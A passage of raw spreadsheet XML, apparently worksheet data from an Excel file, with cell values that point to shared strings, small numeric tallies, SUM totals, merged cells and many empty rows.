      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
      <c r="N2" s="1"/>
      <c r="O2" s="1"/>
      <c r="P2" s="1"/>
      <c r="Q2" s="1"/>
      <c r="R2" s="1"/>
      <c r="S2" s="1"/>
      <c r="T2" s="1"/>
      <c r="U2" s="1"/>
      <c r="V2" s="1"/>
      <c r="W2" s="1"/>
      <c r="X2" s="1"/>
      <c r="Y2" s="1"/>
      <c r="Z2" s="1"/>
      <c r="AA2" s="1"/>
      <c r="AB2" s="1"/>
      <c r="AC2" s="5"/>
      <c r="AD2" s="5"/>
      <c r="AE2" s="5"/>
      <c r="AF2" s="5"/>
      <c r="AG2" s="5"/>
      <c r="AH2" s="5"/>
      <c r="AI2" s="5"/>
      <c r="AJ2" s="5"/>
      <c r="AK2" s="5"/>
      <c r="AL2" s="5"/>
      <c r="AM2" s="5"/>
      <c r="AN2" s="5"/>
      <c r="AO2" s="5"/>
      <c r="AP2" s="5"/>
      <c r="AQ2" s="5"/>
      <c r="AR2" s="5"/>
      <c r="AS2" s="5"/>
      <c r="AT2" s="5"/>
      <c r="AU2" s="5"/>
      <c r="AV2" s="5"/>
      <c r="AW2" s="5"/>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>157</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>158</v>
      </c>
      <c r="C3" s="4">
        <v>1.0</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>159</v>
      </c>
      <c r="E3" s="21">
        <v>2.0</v>
      </c>
      <c r="F3" s="22" t="s">
        <v>160</v>
      </c>
      <c r="G3" s="4">
        <v>2.0</v>
      </c>
      <c r="H3" s="4">
        <v>1.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>161</v>
      </c>
      <c r="J3" s="4">
        <v>3.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>162</v>
      </c>
      <c r="M3" s="4">
        <v>3.0</v>
      </c>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="4" t="s">
        <v>163</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>164</v>
      </c>
      <c r="C4" s="4">
        <v>1.0</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>165</v>
      </c>
      <c r="E4" s="21">
        <v>1.0</v>
      </c>
      <c r="F4" s="23" t="s">
        <v>166</v>
      </c>
      <c r="G4" s="4">
        <v>0.0</v>
      </c>
      <c r="H4" s="4">
        <v>0.0</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>167</v>
      </c>
      <c r="J4" s="4">
        <v>1.0</v>
      </c>
      <c r="K4" s="4">
        <v>0.0</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>168</v>
      </c>
      <c r="M4" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="4" t="s">
        <v>163</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>169</v>
      </c>
      <c r="C5" s="4">
        <v>0.0</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>170</v>
      </c>
      <c r="E5" s="21">
        <v>3.0</v>
      </c>
      <c r="F5" s="24" t="s">
        <v>171</v>
      </c>
      <c r="G5" s="4">
        <v>0.0</v>
      </c>
      <c r="H5" s="4">
        <v>0.0</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>172</v>
      </c>
      <c r="J5" s="4">
        <v>4.0</v>
      </c>
      <c r="K5" s="4">
        <v>0.0</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>173</v>
      </c>
      <c r="M5" s="4">
        <v>4.0</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="4" t="s">
        <v>163</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>174</v>
      </c>
      <c r="C6" s="4">
        <v>0.0</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>170</v>
      </c>
      <c r="E6" s="21">
        <v>0.0</v>
      </c>
      <c r="F6" s="24" t="s">
        <v>175</v>
      </c>
      <c r="G6" s="4">
        <v>0.0</v>
      </c>
      <c r="H6" s="4">
        <v>0.0</v>
      </c>
      <c r="I6" s="4" t="s">
        <v>172</v>
      </c>
      <c r="J6" s="4">
        <v>1.0</v>
      </c>
      <c r="K6" s="4">
        <v>0.0</v>
      </c>
      <c r="L6" s="4" t="s">
        <v>176</v>
      </c>
      <c r="M6" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="A7" s="4" t="s">
        <v>177</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>178</v>
      </c>
      <c r="C7" s="4">
        <v>1.0</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>179</v>
      </c>
      <c r="E7" s="21">
        <v>1.0</v>
      </c>
      <c r="F7" s="23" t="s">
        <v>180</v>
      </c>
      <c r="G7" s="4">
        <v>1.0</v>
      </c>
      <c r="H7" s="4">
        <v>0.0</v>
      </c>
      <c r="I7" s="4" t="s">
        <v>181</v>
      </c>
      <c r="J7" s="4">
        <v>1.0</v>
      </c>
      <c r="K7" s="4">
        <v>0.0</v>
      </c>
      <c r="L7" s="4" t="s">
        <v>182</v>
      </c>
      <c r="M7" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1">
      <c r="A8" s="4" t="s">
        <v>183</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>184</v>
      </c>
      <c r="C8" s="4">
        <v>1.0</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>185</v>
      </c>
      <c r="E8" s="21">
        <v>2.0</v>
      </c>
      <c r="F8" s="23" t="s">
        <v>186</v>
      </c>
      <c r="G8" s="4">
        <v>2.0</v>
      </c>
      <c r="H8" s="4">
        <v>0.0</v>
      </c>
      <c r="I8" s="4" t="s">
        <v>187</v>
      </c>
      <c r="J8" s="4">
        <v>1.0</v>
      </c>
      <c r="K8" s="4">
        <v>0.0</v>
      </c>
      <c r="L8" s="4" t="s">
        <v>188</v>
      </c>
      <c r="M8" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1">
      <c r="A9" s="4" t="s">
        <v>189</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>190</v>
      </c>
      <c r="C9" s="4">
        <v>0.0</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>191</v>
      </c>
      <c r="E9" s="21">
        <v>1.0</v>
      </c>
      <c r="F9" s="23" t="s">
        <v>192</v>
      </c>
      <c r="G9" s="4">
        <v>1.0</v>
      </c>
      <c r="H9" s="4">
        <v>1.0</v>
      </c>
      <c r="I9" s="4" t="s">
        <v>193</v>
      </c>
      <c r="J9" s="4">
        <v>1.0</v>
      </c>
      <c r="K9" s="4">
        <v>1.0</v>
      </c>
      <c r="L9" s="4" t="s">
        <v>194</v>
      </c>
      <c r="M9" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1">
      <c r="A10" s="4" t="s">
        <v>195</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>196</v>
      </c>
      <c r="C10" s="4">
        <v>1.0</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>197</v>
      </c>
      <c r="E10" s="21">
        <v>1.0</v>
      </c>
      <c r="F10" s="23" t="s">
        <v>198</v>
      </c>
      <c r="G10" s="4">
        <v>1.0</v>
      </c>
      <c r="H10" s="4">
        <v>0.0</v>
      </c>
      <c r="I10" s="4" t="s">
        <v>199</v>
      </c>
      <c r="J10" s="4">
        <v>1.0</v>
      </c>
      <c r="K10" s="4">
        <v>0.0</v>
      </c>
      <c r="L10" s="4" t="s">
        <v>200</v>
      </c>
      <c r="M10" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1">
      <c r="A11" s="4" t="s">
        <v>201</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>202</v>
      </c>
      <c r="C11" s="4">
        <v>4.0</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>203</v>
      </c>
      <c r="E11" s="21">
        <v>4.0</v>
      </c>
      <c r="F11" s="23" t="s">
        <v>204</v>
      </c>
      <c r="G11" s="4">
        <v>3.0</v>
      </c>
      <c r="H11" s="4">
        <v>0.0</v>
      </c>
      <c r="I11" s="4" t="s">
        <v>205</v>
      </c>
      <c r="J11" s="4">
        <v>4.0</v>
      </c>
      <c r="K11" s="4">
        <v>0.0</v>
      </c>
      <c r="L11" s="4" t="s">
        <v>206</v>
      </c>
      <c r="M11" s="4">
        <v>4.0</v>
      </c>
    </row>
    <row r="12" ht="15.75" customHeight="1">
      <c r="A12" s="4" t="s">
        <v>207</v>
      </c>
      <c r="B12" s="4" t="s">
        <v>208</v>
      </c>
      <c r="C12" s="4">
        <v>0.0</v>
      </c>
      <c r="D12" s="4" t="s">
        <v>209</v>
      </c>
      <c r="E12" s="21">
        <v>9.0</v>
      </c>
      <c r="F12" s="23" t="s">
        <v>210</v>
      </c>
      <c r="G12" s="4">
        <v>0.0</v>
      </c>
      <c r="H12" s="4">
        <v>1.0</v>
      </c>
      <c r="I12" s="4" t="s">
        <v>211</v>
      </c>
      <c r="J12" s="4">
        <v>9.0</v>
      </c>
      <c r="K12" s="4">
        <v>0.0</v>
      </c>
      <c r="L12" s="4" t="s">
        <v>212</v>
      </c>
      <c r="M12" s="4">
        <v>9.0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1">
      <c r="A13" s="4" t="s">
        <v>207</v>
      </c>
      <c r="B13" s="4" t="s">
        <v>213</v>
      </c>
      <c r="C13" s="4">
        <v>0.0</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>214</v>
      </c>
      <c r="E13" s="21">
        <v>1.0</v>
      </c>
      <c r="F13" s="24" t="s">
        <v>215</v>
      </c>
      <c r="I13" s="4" t="s">
        <v>216</v>
      </c>
      <c r="J13" s="4">
        <v>1.0</v>
      </c>
      <c r="K13" s="4">
        <v>1.0</v>
      </c>
      <c r="L13" s="4" t="s">
        <v>217</v>
      </c>
      <c r="M13" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1">
      <c r="A14" s="4" t="s">
        <v>207</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>218</v>
      </c>
      <c r="C14" s="4">
        <v>0.0</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>214</v>
      </c>
      <c r="E14" s="21">
        <v>1.0</v>
      </c>
      <c r="F14" s="23" t="s">
        <v>219</v>
      </c>
      <c r="I14" s="4" t="s">
        <v>216</v>
      </c>
      <c r="J14" s="4">
        <v>2.0</v>
      </c>
      <c r="K14" s="4">
        <v>1.0</v>
      </c>
      <c r="L14" s="4" t="s">
        <v>220</v>
      </c>
      <c r="M14" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1">
      <c r="C15" s="10">
        <f>sum(C3:C11)</f>
        <v>9</v>
      </c>
      <c r="E15" s="25">
        <f>sum(E3:E14)</f>
        <v>26</v>
      </c>
      <c r="F15" s="26"/>
      <c r="G15" s="10">
        <f t="shared" ref="G15:H15" si="1">sum(G3:G14)</f>
        <v>10</v>
      </c>
      <c r="H15" s="10">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="J15" s="10">
        <f t="shared" ref="J15:K15" si="2">SUM(J3:J14)</f>
        <v>29</v>
      </c>
      <c r="K15" s="10">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="M15" s="10">
        <f>SUM(M3:M14)</f>
        <v>30</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1">
      <c r="C16" s="4"/>
      <c r="D16" s="4"/>
      <c r="E16" s="4"/>
      <c r="F16" s="4"/>
      <c r="G16" s="4"/>
      <c r="H16" s="4" t="s">
        <v>221</v>
      </c>
      <c r="I16" s="4"/>
      <c r="J16" s="4"/>
      <c r="K16" s="4" t="s">
        <v>222</v>
      </c>
      <c r="L16" s="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5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M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88"/>
    <col customWidth="1" min="11" max="11" width="23.0"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="27" t="s">
        <v>23</v>
      </c>
      <c r="B1" s="27" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="29" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="22" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="22"/>
      <c r="O1" s="22"/>
      <c r="P1" s="22"/>
      <c r="Q1" s="22"/>
      <c r="R1" s="22"/>
      <c r="S1" s="22"/>
      <c r="T1" s="22"/>
      <c r="U1" s="22"/>
      <c r="V1" s="22"/>
      <c r="W1" s="22"/>
      <c r="X1" s="22"/>
      <c r="Y1" s="22"/>
      <c r="Z1" s="22"/>
      <c r="AA1" s="22"/>
      <c r="AB1" s="22"/>
      <c r="AC1" s="22"/>
      <c r="AD1" s="22"/>
      <c r="AE1" s="26"/>
      <c r="AF1" s="26"/>
      <c r="AG1" s="26"/>
      <c r="AH1" s="26"/>
      <c r="AI1" s="26"/>
      <c r="AJ1" s="26"/>
      <c r="AK1" s="26"/>
      <c r="AL1" s="26"/>
      <c r="AM1" s="26"/>
      <c r="AN1" s="26"/>
      <c r="AO1" s="26"/>
      <c r="AP1" s="26"/>
      <c r="AQ1" s="26"/>
      <c r="AR1" s="26"/>
      <c r="AS1" s="26"/>
      <c r="AT1" s="26"/>
      <c r="AU1" s="26"/>
      <c r="AV1" s="26"/>
      <c r="AW1" s="26"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
      <c r="C2" s="30" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="30" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="31" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="31" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="32" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="32" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="32" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="33" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="33" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="33" t="s">
        <v>26</v>
      </c>
      <c r="N2" s="22"/>
      <c r="O2" s="22"/>
      <c r="P2" s="22"/>
      <c r="Q2" s="22"/>
      <c r="R2" s="22"/>
      <c r="S2" s="22"/>
      <c r="T2" s="22"/>
      <c r="U2" s="22"/>
      <c r="V2" s="22"/>
      <c r="W2" s="22"/>
      <c r="X2" s="22"/>
      <c r="Y2" s="22"/>
      <c r="Z2" s="22"/>
      <c r="AA2" s="22"/>
      <c r="AB2" s="22"/>
      <c r="AC2" s="22"/>
      <c r="AD2" s="22"/>
      <c r="AE2" s="26"/>
      <c r="AF2" s="26"/>
      <c r="AG2" s="26"/>
      <c r="AH2" s="26"/>
      <c r="AI2" s="26"/>
      <c r="AJ2" s="26"/>
      <c r="AK2" s="26"/>
      <c r="AL2" s="26"/>
      <c r="AM2" s="26"/>
      <c r="AN2" s="26"/>
      <c r="AO2" s="26"/>
      <c r="AP2" s="26"/>
      <c r="AQ2" s="26"/>
      <c r="AR2" s="26"/>
      <c r="AS2" s="26"/>
      <c r="AT2" s="26"/>
      <c r="AU2" s="26"/>
      <c r="AV2" s="26"/>
      <c r="AW2" s="26"/>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="34" t="s">
        <v>223</v>
      </c>
      <c r="B3" s="34" t="s">
        <v>224</v>
      </c>
      <c r="C3" s="35">
        <v>1.0</v>
      </c>
      <c r="D3" s="35" t="s">
        <v>225</v>
      </c>
      <c r="E3" s="4">
        <v>1.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>226</v>
      </c>
      <c r="G3" s="36">
        <v>1.0</v>
      </c>
      <c r="H3" s="36">
        <v>0.0</v>
      </c>
      <c r="I3" s="36" t="s">
        <v>225</v>
      </c>
      <c r="J3" s="36">
        <v>1.0</v>
      </c>
      <c r="K3" s="36">
        <v>0.0</v>
      </c>
      <c r="L3" s="36" t="s">
        <v>227</v>
      </c>
      <c r="M3" s="36">
        <v>1.0</v>
      </c>
      <c r="N3" s="36"/>
      <c r="S3" s="36"/>
      <c r="T3" s="36"/>
      <c r="U3" s="36"/>
      <c r="V3" s="36"/>
      <c r="AB3" s="34">
        <v>0.0</v>
      </c>
      <c r="AC3" s="34">
        <v>0.0</v>
      </c>
      <c r="AD3" s="34" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="34" t="s">
        <v>229</v>
      </c>
      <c r="B4" s="34" t="s">
        <v>230</v>
      </c>
      <c r="C4" s="37">
        <v>1.0</v>
      </c>
      <c r="D4" s="35" t="s">
        <v>231</v>
      </c>
      <c r="E4" s="4">
        <v>1.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>232</v>
      </c>
      <c r="G4" s="36">
        <v>1.0</v>
      </c>
      <c r="H4" s="36">
        <v>1.0</v>
      </c>
      <c r="I4" s="36" t="s">
        <v>233</v>
      </c>
      <c r="J4" s="36">
        <v>1.0</v>
      </c>
      <c r="K4" s="36">
        <v>0.0</v>
      </c>
      <c r="L4" s="36" t="s">
        <v>234</v>
      </c>
      <c r="M4" s="36">
        <v>1.0</v>
      </c>
      <c r="N4" s="36"/>
      <c r="R4" s="36"/>
      <c r="S4" s="36"/>
      <c r="T4" s="36"/>
      <c r="U4" s="36"/>
      <c r="V4" s="36"/>
      <c r="AB4" s="34">
        <v>1.0</v>
      </c>
      <c r="AC4" s="34">
        <v>1.0</v>
      </c>
      <c r="AD4" s="34" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="34" t="s">
        <v>236</v>
      </c>
      <c r="B5" s="34" t="s">
        <v>237</v>
      </c>
      <c r="C5" s="35">
        <v>0.0</v>
      </c>
      <c r="D5" s="35" t="s">
        <v>238</v>
      </c>
      <c r="E5" s="4">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>239</v>
      </c>
      <c r="G5" s="36">
        <v>1.0</v>
      </c>
      <c r="H5" s="36">
        <v>1.0</v>
      </c>
      <c r="I5" s="36" t="s">
        <v>240</v>
      </c>
      <c r="J5" s="36">
        <v>1.0</v>
      </c>
      <c r="K5" s="36">
        <v>0.0</v>
      </c>
      <c r="L5" s="36" t="s">
        <v>241</v>
      </c>
      <c r="M5" s="36">
        <v>1.0</v>
      </c>
      <c r="N5" s="36"/>
      <c r="R5" s="36"/>
      <c r="S5" s="36"/>
      <c r="T5" s="36"/>
      <c r="U5" s="36"/>
      <c r="V5" s="36"/>
      <c r="AB5" s="34">
        <v>1.0</v>
      </c>
      <c r="AC5" s="38">
        <v>1.0</v>
      </c>
      <c r="AD5" s="38" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="34" t="s">
        <v>243</v>
      </c>
      <c r="B6" s="34" t="s">
        <v>244</v>
      </c>
      <c r="C6" s="37">
        <v>1.0</v>
      </c>
      <c r="D6" s="35" t="s">
        <v>245</v>
      </c>
      <c r="E6" s="4">
        <v>1.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>246</v>
      </c>
      <c r="G6" s="36">
        <v>1.0</v>
      </c>
      <c r="H6" s="36">
        <v>1.0</v>
      </c>
      <c r="I6" s="36" t="s">
        <v>245</v>
      </c>
      <c r="J6" s="36">
        <v>1.0</v>
      </c>
      <c r="K6" s="36">
        <v>0.0</v>
      </c>
      <c r="L6" s="36" t="s">
        <v>247</v>
      </c>
      <c r="M6" s="36">
        <v>1.0</v>
      </c>
      <c r="N6" s="36"/>
      <c r="R6" s="36"/>
      <c r="S6" s="36"/>
      <c r="T6" s="36"/>
      <c r="U6" s="36"/>
      <c r="V6" s="36"/>
      <c r="AB6" s="34">
        <v>1.0</v>
      </c>
      <c r="AC6" s="38">
        <v>1.0</v>
      </c>
      <c r="AD6" s="38" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="A7" s="34" t="s">
        <v>249</v>
      </c>
      <c r="B7" s="34" t="s">
        <v>250</v>
      </c>
      <c r="C7" s="37">
        <v>0.0</v>
      </c>
      <c r="D7" s="35" t="s">
        <v>251</v>
      </c>
      <c r="E7" s="4">
        <v>1.0</v>
      </c>
      <c r="F7" s="38" t="s">
        <v>252</v>
      </c>
      <c r="G7" s="36">
        <v>1.0</v>
      </c>
      <c r="H7" s="36">
        <v>0.0</v>
      </c>
      <c r="I7" s="36" t="s">
        <v>253</v>
      </c>
      <c r="J7" s="36">
        <v>1.0</v>
      </c>
      <c r="K7" s="36">
        <v>0.0</v>
      </c>
      <c r="L7" s="36"/>
      <c r="M7" s="36">
        <v>1.0</v>
      </c>
      <c r="N7" s="36"/>
      <c r="R7" s="36"/>
      <c r="S7" s="36"/>
      <c r="T7" s="36"/>
      <c r="U7" s="36"/>
      <c r="V7" s="36"/>
      <c r="AB7" s="34">
        <v>1.0</v>
      </c>
      <c r="AC7" s="34">
        <v>1.0</v>
      </c>
      <c r="AD7" s="4" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="8" ht="14.25" customHeight="1">
      <c r="A8" s="4" t="s">
        <v>255</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>256</v>
      </c>
      <c r="C8" s="39">
        <v>0.0</v>
      </c>
      <c r="D8" s="23" t="s">
        <v>257</v>
      </c>
      <c r="E8" s="4">
        <v>1.0</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>258</v>
      </c>
      <c r="G8" s="4">
        <v>1.0</v>
      </c>
      <c r="H8" s="4">
        <v>0.0</v>
      </c>
      <c r="I8" s="4" t="s">
        <v>259</v>
      </c>
      <c r="J8" s="4">
        <v>1.0</v>
      </c>
      <c r="K8" s="4">
        <v>0.0</v>
      </c>
      <c r="L8" s="4" t="s">
        <v>260</v>
      </c>
      <c r="M8" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="9">
      <c r="B9" s="5"/>
      <c r="C9" s="25">
        <f>SUM(C2:C8)</f>
        <v>3</v>
      </c>
      <c r="D9" s="26"/>
      <c r="E9" s="10">
        <f>SUM(E3:E8)</f>
        <v>6</v>
      </c>
      <c r="G9" s="10">
        <f t="shared" ref="G9:H9" si="1">SUM(G3:G8)</f>
        <v>6</v>
      </c>
      <c r="H9" s="10">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="J9" s="10">
        <f t="shared" ref="J9:K9" si="2">SUM(J3:J8)</f>
        <v>6</v>
      </c>
      <c r="K9" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M9" s="10">
        <f>SUM(M3:M8)</f>
        <v>6</v>
      </c>
    </row>
    <row r="10">
      <c r="B10" s="5"/>
      <c r="H10" s="4" t="s">
        <v>261</v>
      </c>
      <c r="K10" s="4" t="s">
        <v>262</v>
      </c>
    </row>
    <row r="11">
      <c r="B11" s="5"/>
    </row>
    <row r="12">
      <c r="B12" s="5"/>
    </row>
    <row r="13">
      <c r="B13" s="5"/>
    </row>
    <row r="14">
      <c r="B14" s="5"/>
    </row>
    <row r="15">
      <c r="B15" s="5"/>
    </row>
    <row r="16">
      <c r="B16" s="5"/>
    </row>
    <row r="17">
      <c r="B17" s="5"/>
    </row>
    <row r="18">
      <c r="B18" s="5"/>
    </row>
    <row r="19">
      <c r="B19" s="5"/>
    </row>
    <row r="20">
      <c r="B20" s="5"/>
    </row>
    <row r="21">
      <c r="B21" s="5"/>
    </row>
    <row r="22">
      <c r="B22" s="5"/>
    </row>
    <row r="23">
      <c r="B23" s="5"/>
    </row>
    <row r="24">
      <c r="B24" s="5"/>
    </row>
    <row r="25">
      <c r="B25" s="5"/>
    </row>
    <row r="26">
      <c r="B26" s="5"/>
    </row>
    <row r="27">
      <c r="B27" s="5"/>
    </row>
    <row r="28">
      <c r="B28" s="5"/>
    </row>
    <row r="29">
      <c r="B29" s="5"/>
    </row>
    <row r="30">
      <c r="B30" s="5"/>
    </row>
    <row r="31">
      <c r="B31" s="5"/>
    </row>
    <row r="32">
      <c r="B32" s="5"/>
    </row>
    <row r="33">
      <c r="B33" s="5"/>
    </row>
    <row r="34">
      <c r="B34" s="5"/>
    </row>
    <row r="35">
      <c r="B35" s="5"/>
    </row>
    <row r="36">
      <c r="B36" s="5"/>
    </row>
    <row r="37">
      <c r="B37" s="5"/>
    </row>
    <row r="38">
      <c r="B38" s="5"/>
    </row>
    <row r="39">
      <c r="B39" s="5"/>
    </row>
    <row r="40">
      <c r="B40" s="5"/>
    </row>
    <row r="41">
      <c r="B41" s="5"/>
    </row>
    <row r="42">
      <c r="B42" s="5"/>
    </row>
    <row r="43">
      <c r="B43" s="5"/>
    </row>
    <row r="44">
      <c r="B44" s="5"/>
    </row>
    <row r="45">
      <c r="B45" s="5"/>
    </row>
    <row r="46">
      <c r="B46" s="5"/>
    </row>
    <row r="47">
      <c r="B47" s="5"/>
    </row>
    <row r="48">
      <c r="B48" s="5"/>
    </row>
    <row r="49">
      <c r="B49" s="5"/>
    </row>
    <row r="50">
      <c r="B50" s="5"/>
    </row>
    <row r="51">
      <c r="B51" s="5"/>
    </row>
    <row r="52">
      <c r="B52" s="5"/>
    </row>
    <row r="53">
      <c r="B53" s="5"/>
    </row>
    <row r="54">
      <c r="B54" s="5"/>
    </row>
    <row r="55">
      <c r="B55" s="5"/>
    </row>
    <row r="56">
      <c r="B56" s="5"/>
    </row>
    <row r="57">
      <c r="B57" s="5"/>
    </row>
    <row r="58">
      <c r="B58" s="5"/>
    </row>
    <row r="59">
      <c r="B59" s="5"/>
    </row>
    <row r="60">
      <c r="B60" s="5"/>
    </row>
    <row r="61">
      <c r="B61" s="5"/>
    </row>
    <row r="62">
      <c r="B62" s="5"/>
    </row>
    <row r="63">
      <c r="B63" s="5"/>
    </row>
    <row r="64">
      <c r="B64" s="5"/>
    </row>
    <row r="65">
      <c r="B65" s="5"/>
    </row>
    <row r="66">
      <c r="B66" s="5"/>
    </row>
    <row r="67">
      <c r="B67" s="5"/>
    </row>
    <row r="68">
      <c r="B68" s="5"/>
    </row>
    <row r="69">
      <c r="B69" s="5"/>
    </row>
    <row r="70">
      <c r="B70" s="5"/>
    </row>
    <row r="71">
      <c r="B71" s="5"/>
    </row>
    <row r="72">
      <c r="B72" s="5"/>
    </row>
    <row r="73">
      <c r="B73" s="5"/>
    </row>
    <row r="74">
      <c r="B74" s="5"/>
    </row>
    <row r="75">
      <c r="B75" s="5"/>
    </row>
    <row r="76">
      <c r="B76" s="5"/>
    </row>
    <row r="77">
      <c r="B77" s="5"/>
    </row>
    <row r="78">
      <c r="B78" s="5"/>
    </row>
    <row r="79">
      <c r="B79" s="5"/>
    </row>
    <row r="80">
      <c r="B80" s="5"/>
    </row>
    <row r="81">
      <c r="B81" s="5"/>
    </row>
    <row r="82">
      <c r="B82" s="5"/>
    </row>
    <row r="83">
      <c r="B83" s="5"/>
    </row>
    <row r="84">
      <c r="B84" s="5"/>
    </row>
    <row r="85">
      <c r="B85" s="5"/>
    </row>
    <row r="86">
      <c r="B86" s="5"/>
    </row>
    <row r="87">
      <c r="B87" s="5"/>
    </row>
    <row r="88">
      <c r="B88" s="5"/>
    </row>
    <row r="89">
      <c r="B89" s="5"/>
    </row>
    <row r="90">
      <c r="B90" s="5"/>
    </row>
    <row r="91">
      <c r="B91" s="5"/>
    </row>
    <row r="92">
      <c r="B92" s="5"/>
    </row>
    <row r="93">
      <c r="B93" s="5"/>
    </row>
    <row r="94">
      <c r="B94" s="5"/>
    </row>
    <row r="95">
      <c r="B95" s="5"/>
    </row>
    <row r="96">
      <c r="B96" s="5"/>
    </row>
    <row r="97">
      <c r="B97" s="5"/>
    </row>
    <row r="98">
      <c r="B98" s="5"/>
    </row>
    <row r="99">
      <c r="B99" s="5"/>
    </row>
    <row r="100">
      <c r="B100" s="5"/>
    </row>
    <row r="101">
      <c r="B101" s="5"/>
    </row>
    <row r="102">
      <c r="B102" s="5"/>
    </row>
    <row r="103">
      <c r="B103" s="5"/>
    </row>
    <row r="104">
      <c r="B104" s="5"/>
    </row>
    <row r="105">
      <c r="B105" s="5"/>
    </row>
    <row r="106">
      <c r="B106" s="5"/>
    </row>
    <row r="107">
      <c r="B107" s="5"/>
    </row>
    <row r="108">
      <c r="B108" s="5"/>
    </row>
    <row r="109">
      <c r="B109" s="5"/>
    </row>
    <row r="110">
      <c r="B110" s="5"/>
    </row>
    <row r="111">
      <c r="B111" s="5"/>
    </row>
    <row r="112">
      <c r="B112" s="5"/>
    </row>
    <row r="113">
      <c r="B113" s="5"/>
    </row>
    <row r="114">
      <c r="B114" s="5"/>
    </row>
    <row r="115">
      <c r="B115" s="5"/>
    </row>
    <row r="116">
      <c r="B116" s="5"/>
    </row>
    <row r="117">
      <c r="B117" s="5"/>
    </row>
    <row r="118">
      <c r="B118" s="5"/>
    </row>
    <row r="119">
      <c r="B119" s="5"/>
    </row>
    <row r="120">
      <c r="B120" s="5"/>
    </row>
    <row r="121">
      <c r="B121" s="5"/>
    </row>
    <row r="122">
      <c r="B122" s="5"/>
    </row>
    <row r="123">
      <c r="B123" s="5"/>
    </row>
    <row r="124">
      <c r="B124" s="5"/>
    </row>
    <row r="125">
      <c r="B125" s="5"/>
    </row>
    <row r="126">
      <c r="B126" s="5"/>
